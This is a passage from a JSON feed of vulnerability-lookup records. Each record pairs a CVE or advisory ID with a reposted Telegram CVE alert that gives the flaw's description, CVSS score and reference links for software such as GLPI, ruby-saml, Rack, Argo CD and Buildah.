https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "6cf89f3d-ce84-42b2-a560-470c860a2c4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8327", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "8d7a756b-396f-4cd4-bcf6-ab28f15ba342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2P3-33FF-R555", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7968", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24801\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18.\n\ud83d\udccf Published: 2025-03-18T18:32:06.401Z\n\ud83d\udccf Modified: 2025-03-18T18:32:06.401Z\n\ud83d\udd17 References:\n1. https://github.com/glpi-project/glpi/security/advisories/GHSA-g2p3-33ff-r555", "creation_timestamp": "2025-03-18T19:03:05.000000Z"}, {"uuid": "82c87fe3-fdc5-4c68-a3ad-c62d41dc3e6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HRW-X7PR-4MP8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7235", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52812\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: LF Edge eKuiper is an internet-of-things data analytics and stream processing engine. Prior to version 2.0.8, auser with rights to modify the service (e.g. kuiperUser role) can inject a cross-site scripting payload into the rule `id` parameter. Then, after any user with access to this service (e.g. admin) tries make any modifications with the rule (update, run, stop, delete), a payload acts in the victim's browser. Version 2.0.8 fixes the issue.\n\ud83d\udccf Published: 2025-03-10T17:52:13.106Z\n\ud83d\udccf Modified: 2025-03-11T20:13:01.144Z\n\ud83d\udd17 References:\n1. https://github.com/lf-edge/ekuiper/security/advisories/GHSA-6hrw-x7pr-4mp8\n2. https://github.com/lf-edge/ekuiper/blob/dbce32d5a195cf1de949b3a6a4e29f0df0f3330d/internal/server/rest.go#L681\n3. https://github.com/lf-edge/ekuiper/blob/dbce32d5a195cf1de949b3a6a4e29f0df0f3330d/internal/server/rest.go#L716\n4. https://github.com/lf-edge/ekuiper/blob/dbce32d5a195cf1de949b3a6a4e29f0df0f3330d/internal/server/rest.go#L735\n5. https://github.com/lf-edge/ekuiper/blob/dbce32d5a195cf1de949b3a6a4e29f0df0f3330d/internal/server/rest.go#L794\n6. https://github.com/lf-edge/ekuiper/blob/dbce32d5a195cf1de949b3a6a4e29f0df0f3330d/internal/server/rest.go#L809\n7. https://github.com/lf-edge/ekuiper/blob/dbce32d5a195cf1de949b3a6a4e29f0df0f3330d/internal/server/rest.go#L824\n8. https://github.com/lf-edge/ekuiper/releases/tag/v2.0.8", "creation_timestamp": "2025-03-11T20:41:30.000000Z"}, {"uuid": "f6103849-1f76-418a-b552-1b31eb11ab8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3823", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7257", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2905\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A security vulnerability has been discovered within rpm-ostree, pertaining to the /etc/shadow file in default builds having the world-readable bit enabled. This issue arises from the default permissions being set at a higher level than recommended, potentially exposing sensitive authentication data to unauthorized access.\n\ud83d\udccf Published: 2024-04-25T17:44:15.985Z\n\ud83d\udccf Modified: 2025-03-12T02:26:09.653Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:3401\n2. https://access.redhat.com/errata/RHSA-2024:3823\n3. https://access.redhat.com/security/cve/CVE-2024-2905\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2271585\n5. https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6", "creation_timestamp": "2025-03-12T02:40:26.000000Z"}, {"uuid": "c5d4b726-1350-46ed-aebc-e9a90d25731f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3401", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7257", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2905\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A security vulnerability has been discovered within rpm-ostree, pertaining to the /etc/shadow file in default builds having the world-readable bit enabled. This issue arises from the default permissions being set at a higher level than recommended, potentially exposing sensitive authentication data to unauthorized access.\n\ud83d\udccf Published: 2024-04-25T17:44:15.985Z\n\ud83d\udccf Modified: 2025-03-12T02:26:09.653Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:3401\n2. https://access.redhat.com/errata/RHSA-2024:3823\n3. https://access.redhat.com/security/cve/CVE-2024-2905\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2271585\n5. https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6", "creation_timestamp": "2025-03-12T02:40:26.000000Z"}, {"uuid": "e5780fc8-5d7d-4c49-8889-6eabc5d74cf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2663", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0736\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in Infinispan, when using JGroups with JDBC_PING. This issue occurs when an application inadvertently exposes sensitive information, such as configuration details or credentials, through logging mechanisms. This exposure can lead to unauthorized access and exploitation by malicious actors.\n\ud83d\udccf Published: 2025-01-28T09:12:38.101Z\n\ud83d\udccf Modified: 2025-03-12T03:27:37.478Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2663\n2. https://access.redhat.com/security/cve/CVE-2025-0736\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2342233", "creation_timestamp": "2025-03-12T03:44:26.000000Z"}, {"uuid": "bdb01a55-fffd-4e72-b7ff-eb4e34e90cb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HW46-3HMR-X9XV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25293\n\ud83d\udd25 CVSS Score: 6.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. Prior to versions 1.12.4 and 1.18.0, ruby-saml is susceptible to remote Denial of Service (DoS) with compressed SAML responses. ruby-saml uses zlib to decompress SAML responses in case they're compressed. It is possible to bypass the message size check with a compressed assertion since the message size is checked before inflation and not after. This issue may lead to remote Denial of Service (DoS). Versions 1.12.4 and 1.18.0 fix the issue.\n\ud83d\udccf Published: 2025-03-12T20:11:08.860Z\n\ud83d\udccf Modified: 2025-03-12T20:36:17.830Z\n\ud83d\udd17 References:\n1. https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-92rq-c8cf-prrq\n2. https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv\n3. https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a\n4. https://github.com/SAML-Toolkits/ruby-saml/commit/e2da4c6dae7dc01a4d9cd221395140a67e2b3eb1\n5. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4\n6. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0", "creation_timestamp": "2025-03-12T20:42:28.000000Z"}, {"uuid": "0e521e0a-20af-4005-9750-9df7818c44c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44F7-5FJ5-H4PX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7151", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27403\n\ud83d\udd25 CVSS Score: 7.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:L)\n\ud83d\udd39 Description: Ratify is a verification engine as a binary executable and on Kubernetes which enables verification of artifact security metadata and admits for deployment only those that comply with policies the user creates. In a Kubernetes environment, Ratify can be configured to authenticate to a private Azure Container Registry (ACR). The Azure workload identity and Azure managed identity authentication providers are configured in this setup. Users that configure a private ACR to be used with the Azure authentication providers may be impacted by a vulnerability that exists in versions prior to 1.2.3 and 1.3.2. Both Azure authentication providers attempt to exchange an Entra ID (EID) token for an ACR refresh token. However, Ratify\u2019s Azure authentication providers did not verify that the target registry is an ACR. This could have led to the EID token being presented to a non-ACR registry during token exchange. EID tokens with ACR access can potentially be extracted and abused if a user workload contains an image reference to a malicious registry. As of versions 1.2.3 and 1.3.2, the Azure workload identity and Azure managed identity authentication providers are updated to add new validation prior to EID token exchange. Validation relies upon registry domain validation against a pre-configured list of well-known ACR endpoints. EID token exchange will be executed only if at least one of the configured well-known domain suffixes (wildcard support included) matches the registry domain of the image reference.\n\ud83d\udccf Published: 2025-03-11T14:16:10.013Z\n\ud83d\udccf Modified: 2025-03-11T14:16:10.013Z\n\ud83d\udd17 References:\n1. https://github.com/ratify-project/ratify/security/advisories/GHSA-44f7-5fj5-h4px\n2. https://github.com/ratify-project/ratify/commit/0ec0c08490e3d672ae64b1a220c90d5484f1c93f\n3. https://github.com/ratify-project/ratify/commit/84c7c48fa76bb9a1c9583635d1e90bc25b1a546c", "creation_timestamp": "2025-03-11T14:39:46.000000Z"}, {"uuid": "5ae89d8a-c6a8-4066-b9b3-cb4d5beeba7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-92RQ-C8CF-PRRQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25293\n\ud83d\udd25 CVSS Score: 6.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. Prior to versions 1.12.4 and 1.18.0, ruby-saml is susceptible to remote Denial of Service (DoS) with compressed SAML responses. ruby-saml uses zlib to decompress SAML responses in case they're compressed. It is possible to bypass the message size check with a compressed assertion since the message size is checked before inflation and not after. This issue may lead to remote Denial of Service (DoS). Versions 1.12.4 and 1.18.0 fix the issue.\n\ud83d\udccf Published: 2025-03-12T20:11:08.860Z\n\ud83d\udccf Modified: 2025-03-12T20:36:17.830Z\n\ud83d\udd17 References:\n1. https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-92rq-c8cf-prrq\n2. https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv\n3. https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a\n4. https://github.com/SAML-Toolkits/ruby-saml/commit/e2da4c6dae7dc01a4d9cd221395140a67e2b3eb1\n5. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4\n6. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0", "creation_timestamp": "2025-03-12T20:42:28.000000Z"}, {"uuid": "b198726f-bad9-4f85-8846-b4f21a08f74d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7CH4-RR99-CQCW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7129", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22491\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Gatsby is a free and open source framework based on React that helps developers build websites and apps. The gatsby-transformer-remark plugin prior to versions 5.25.1 and 6.3.2 passes input through to the `gray-matter` npm package, which is vulnerable to JavaScript injection in its default configuration, unless input is sanitized.  The vulnerability is present in gatsby-transformer-remark when passing input in data mode (querying MarkdownRemark nodes via GraphQL).  Injected JavaScript executes in the context of the build server. To exploit this vulnerability untrusted/unsanitized input would need to be sourced by or added into a file processed by gatsby-transformer-remark. A patch has been introduced in `gatsby-transformer-remark@5.25.1` and `gatsby-transformer-remark@6.3.2` which mitigates the issue by disabling the `gray-matter` JavaScript Frontmatter engine. As a workaround, if an older version of `gatsby-transformer-remark` must be used, input passed into the plugin should be sanitized ahead of processing. It is encouraged for  projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner.\n\ud83d\udccf Published: 2023-01-13T18:05:00.273Z\n\ud83d\udccf Modified: 2025-03-11T13:34:01.261Z\n\ud83d\udd17 References:\n1. https://github.com/gatsbyjs/gatsby/security/advisories/GHSA-7ch4-rr99-cqcw", "creation_timestamp": "2025-03-11T13:39:44.000000Z"}, {"uuid": "22a80c7c-241d-48ab-97e7-71f969bba5ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C653-6HHG-9X92", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7128", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22460\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: go-ipld-prime is an implementation of the InterPlanetary Linked Data (IPLD) spec interfaces, a batteries-included codec implementations of IPLD for CBOR and JSON, and tooling for basic operations on IPLD objects. Encoding data which contains a Bytes kind Node will pass a Bytes token to the JSON encoder which will panic as it doesn't expect to receive Bytes tokens. Such an encode should be treated as an error, as plain JSON should not be able to encode Bytes. This only impacts uses of the `json` codec. `dag-json` is not impacted. Use of `json` as a decoder is not impacted. This issue is fixed in v0.19.0. As a workaround, one may prefer the `dag-json` codec, which has the ability to encode bytes.\n\ud83d\udccf Published: 2023-01-04T14:53:19.877Z\n\ud83d\udccf Modified: 2025-03-11T13:34:55.463Z\n\ud83d\udd17 References:\n1. https://github.com/ipld/go-ipld-prime/security/advisories/GHSA-c653-6hhg-9x92\n2. https://github.com/ipld/go-ipld-prime/pull/472\n3. https://github.com/ipld/go-ipld-prime/releases/tag/v0.19.0", "creation_timestamp": "2025-03-11T13:39:43.000000Z"}, {"uuid": "d6877877-e7ed-4cc1-876a-68e1311c3b43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CG-7GW9-V8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7111", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2175\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability was found in libzvbi up to 0.2.43. It has been rated as problematic. Affected by this issue is the function _vbi_strndup_iconv. The manipulation leads to integer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.2.44 is able to address this issue. It is recommended to upgrade the affected component. The code maintainer was informed beforehand about the issues. She reacted very fast and highly professional.\n\ud83d\udccf Published: 2025-03-11T07:00:09.753Z\n\ud83d\udccf Modified: 2025-03-11T07:00:09.753Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.299204\n2. https://vuldb.com/?ctiid.299204\n3. https://vuldb.com/?submit.512801\n4. https://github.com/zapping-vbi/zvbi/security/advisories/GHSA-g7cg-7gw9-v8cf\n5. https://github.com/zapping-vbi/zvbi/releases/tag/v0.2.44", "creation_timestamp": "2025-03-11T07:39:40.000000Z"}, {"uuid": "79cc428d-fbe3-43ab-bbe6-12ca7eb76c76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CG-7GW9-V8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7116", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2173\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability was found in libzvbi up to 0.2.43. It has been classified as problematic. Affected is the function vbi_strndup_iconv_ucs2 of the file src/conv.c. The manipulation of the argument src_length leads to uninitialized pointer. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.2.44 is able to address this issue. The patch is identified as 8def647eea27f7fd7ad33ff79c2d6d3e39948dce. It is recommended to upgrade the affected component. The code maintainer was informed beforehand about the issues. She reacted very fast and highly professional.\n\ud83d\udccf Published: 2025-03-11T06:31:05.166Z\n\ud83d\udccf Modified: 2025-03-11T06:31:05.166Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.299202\n2. https://vuldb.com/?ctiid.299202\n3. https://vuldb.com/?submit.512798\n4. https://github.com/zapping-vbi/zvbi/security/advisories/GHSA-g7cg-7gw9-v8cf\n5. https://github.com/zapping-vbi/zvbi/commit/8def647eea27f7fd7ad33ff79c2d6d3e39948dce\n6. https://github.com/zapping-vbi/zvbi/releases/tag/v0.2.44", "creation_timestamp": "2025-03-11T07:39:47.000000Z"}, {"uuid": "9cf0a109-8360-4b2a-b379-ad26077638ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXMX-GQJJ-VHV8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7246", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27101\n\ud83d\udd25 CVSS Score: 7.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Opal is OBiBa\u2019s core database application for biobanks or epidemiological studies. Prior to version 5.1.1, when copying any parent directory to a folder in the /temp/ directory, all files in that parent directory are copied, including files which the user should not have access to. All users of the application are impacted, as this is exploitable by any user to reveal all files in the opal filesystem. This also means that low-privilege users such as DataShield users can retrieve the files of other users. Version 5.1.1 contains a patch for the issue.\n\ud83d\udccf Published: 2025-03-11T21:32:48.746Z\n\ud83d\udccf Modified: 2025-03-11T21:32:48.746Z\n\ud83d\udd17 References:\n1. https://github.com/obiba/opal/security/advisories/GHSA-rxmx-gqjj-vhv8\n2. https://github.com/obiba/opal/commit/fca7dc9c8348064741b2e8b2c31b66660a935743", "creation_timestamp": "2025-03-11T21:39:49.000000Z"}, {"uuid": "d907ac5f-3074-4bce-907b-2c1e5f5a4c3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9HR-J4RF-8FJC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7133", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22482\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions of Argo CD starting with v1.8.2 and prior to 2.3.13, 2.4.19, 2.5.6, and 2.6.0-rc-3  are vulnerable to an improper authorization bug causing the API to accept certain invalid tokens. OIDC providers include an `aud` (audience) claim in signed tokens. The value of that claim specifies the intended audience(s) of the token (i.e. the service or services which are meant to accept the token). Argo CD _does_ validate that the token was signed by Argo CD's configured OIDC provider. But Argo CD _does not_ validate the audience claim, so it will accept tokens that are not intended for Argo CD. If Argo CD's configured OIDC provider also serves other audiences (for example, a file storage service), then Argo CD will accept a token intended for one of those other audiences. Argo CD will grant the user privileges based on the token's `groups` claim, even though those groups were not intended to be used by Argo CD. This bug also increases the impact of a stolen token. If an attacker steals a valid token for a different audience, they can use it to access Argo CD. A patch for this vulnerability has been released in versions 2.6.0-rc3, 2.5.6, 2.4.19, and 2.3.13. There are no workarounds.\n\ud83d\udccf Published: 2023-01-25T18:25:15.287Z\n\ud83d\udccf Modified: 2025-03-11T13:30:49.509Z\n\ud83d\udd17 References:\n1. https://github.com/argoproj/argo-cd/security/advisories/GHSA-q9hr-j4rf-8fjc", "creation_timestamp": "2025-03-11T13:39:50.000000Z"}, {"uuid": "2f15a5df-e9c7-4625-8630-5f30b5695e9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WQH-767X-R66V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7074", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27610\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Rack provides an interface for developing web applications in Ruby. Prior to versions 2.2.13, 3.0.14, and 3.1.12, `Rack::Static` can serve files under the specified `root:` even if `urls:` are provided, which may expose other files under the specified `root:` unexpectedly. The vulnerability occurs because `Rack::Static` does not properly sanitize user-supplied paths before serving files. Specifically, encoded path traversal sequences are not correctly validated, allowing attackers to access files outside the designated static file directory. By exploiting this vulnerability, an attacker can gain access to all files under the specified `root:` directory, provided they are able to determine then path of the file. Versions 2.2.13, 3.0.14, and 3.1.12 contain a patch for the issue. Other mitigations include removing usage of `Rack::Static`, or ensuring that `root:` points at a directory path which only contains files which should be accessed publicly. It is likely that a CDN or similar static file server would also mitigate the issue.\n\ud83d\udccf Published: 2025-03-10T22:19:25.982Z\n\ud83d\udccf Modified: 2025-03-10T22:19:25.982Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack/security/advisories/GHSA-7wqh-767x-r66v\n2. https://github.com/rack/rack/commit/50caab74fa01ee8f5dbdee7bb2782126d20c6583", "creation_timestamp": "2025-03-10T22:40:19.000000Z"}, {"uuid": "2591fe8c-e066-4c16-b8ce-c6f77209bbaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGQ4-4QXC-C462", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7073", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22454\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, pending post titles can be used for cross-site scripting attacks. Pending posts can be created by unprivileged users when a category has the \"require moderator approval of all new topics\" setting set. This vulnerability can lead to a full XSS on sites which have modified or disabled Discourse\u2019s default Content Security Policy. A patch is available in versions 2.8.14 and 3.0.0.beta16.\n\ud83d\udccf Published: 2023-01-05T19:58:36.355Z\n\ud83d\udccf Modified: 2025-03-10T21:31:46.858Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-ggq4-4qxc-c462\n2. https://github.com/discourse/discourse/commit/c0e2d7badac276d82a4056a994b48d68a8993a12", "creation_timestamp": "2025-03-10T21:39:30.000000Z"}, {"uuid": "f4c90a68-ed90-41e3-ab14-e47fdd0a51d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8686", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. 